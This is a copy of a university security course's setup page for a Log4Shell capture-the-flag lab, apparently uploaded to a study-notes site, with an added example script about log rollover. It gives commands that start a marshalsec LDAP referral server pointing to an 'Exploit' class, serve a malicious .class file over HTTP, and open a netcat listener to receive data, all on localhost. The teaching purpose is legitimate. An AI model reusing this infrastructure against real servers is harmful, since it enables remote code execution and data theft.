Setup _ CS 6035_LOG4

School

East Los Angeles College *

Course

300

Subject

Computer Science

Date

Apr 3, 2024

Type

pdf

Pages

3

Uploaded by BrigadierTank13536

3/11/24, 11:33 PM Setup | CS 6035 https://github.gatech.edu/pages/cs6035-tools/cs6035-tools.github.io/Projects/Log4Shell/setup.html

Setup

To get set up for the flags, follow the steps below carefully, and be sure you are running each in a separate terminal window as noted.

You will need to switch users to log in as the log4j user via:

Credentials can be found in Canvas on the Log4Shell Assignment page

In the home directory of the log4j user, start the container with the start script:

    ./StartContainer.sh

Open a new terminal window and go to “Desktop/log4shell/logs”:

    cd Desktop/log4shell/logs

Run the following command to view the logs:

    tail -f cs6035.log

OR to view System.out.println messages:

    tail -f console.log

You should now see the tail of the log file from the running application.
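The `tail -f` commands above follow the file that was open when they started, so output stops once the application rolls the log over to a new file. As an added example (not from the course page), this script reproduces a rollover on a constructed temporary log and shows that `tail -F`, which follows the file name, keeps reading; the temporary paths and log lines are constructed, and it assumes a `tail` that supports `-F` (GNU coreutils).

```shell
#!/usr/bin/env bash
# Added example: constructed log file and lines, not the lab's real logs.
# Reports which tail mode saw the line written after the rollover.
rollover_demo() {
    local dir log pid_f pid_F result i
    dir=$(mktemp -d)
    log="$dir/cs6035.log"
    echo "line before rollover" > "$log"

    # -f follows the open file descriptor; -F follows the file name and
    # reopens it when the file is replaced.
    tail -n 0 -f "$log" > "$dir/follow_fd.out" 2>/dev/null &
    pid_f=$!
    tail -n 0 -F "$log" > "$dir/follow_name.out" 2>/dev/null &
    pid_F=$!
    sleep 1   # give both tails time to open the file

    # Simulate the rollover: the old file is renamed, a new one is created.
    mv "$log" "$log.1"
    echo "line after rollover" > "$log"

    # Wait (up to 10 s) for the name-following tail to pick up the new file.
    for i in 1 2 3 4 5 6 7 8 9 10; do
        grep -q "after rollover" "$dir/follow_name.out" && break
        sleep 1
    done

    kill "$pid_f" "$pid_F" 2>/dev/null || true
    wait "$pid_f" "$pid_F" 2>/dev/null || true

    result=""
    grep -q "after rollover" "$dir/follow_fd.out"   && result="$result -f"
    grep -q "after rollover" "$dir/follow_name.out" && result="$result -F"
    rm -rf "$dir"
    echo "saw post-rollover line:${result:- none}"
}

rollover_demo
```

In the lab terminals this corresponds to running `tail -F cs6035.log` instead of `tail -f cs6035.log`.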
** If the logs stop populating, then just stop and restart the tail. This happens because the logged data gets too large, so the log “rolls over” to another file. **

1. Run the LDAP Server:

Open a new terminal window and run the following command to set the current directory to “Desktop/log4shell/target”:

    cd ~/Desktop/log4shell/target

Next, start the LDAP server by running:

    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:4242/#Exploit"

You can get the IP address of the VM by running the block below in a terminal:

    ip addr show

This outputs the VM’s IP:

    127.0.0.1

It is very important that the port in the LDAP server command matches the port specified in the Malicious server. If your exploit is not working because it is not connecting to the malicious server, your ports likely do not match OR the VM’s IP is not correct.

You should see the following output:

2. Run the Malicious Server:

Open a new terminal and make sure the active directory is the directory that contains your malicious .class file. For simplicity, we have created “Desktop/log4shell/{flag_no}” for you to work in. Do not leave this directory. Run the server in “Desktop/log4shell/{flag_no}” with the following command:

    python3 -m http.server 4242
It is very important that this matches the port specified in the LDAP server. If your exploit is not working because it is not connecting to the malicious server, your ports likely do not match OR the VM’s IP is not correct.

You should see the following output:

3. Read data that is flowing on the network (This step is required for Flag 2 but is optional for the rest):

Open a terminal and run:

    nc -nlvp <your_desired_port>

You should see the following output:

To print debug statements from your Java code, tail the ~/Desktop/log4shell/logs/console.log file and add System.out.println statements to your Exploit.java.

Disclaimer: You are responsible for the information on this website. The content is subject to change at any time.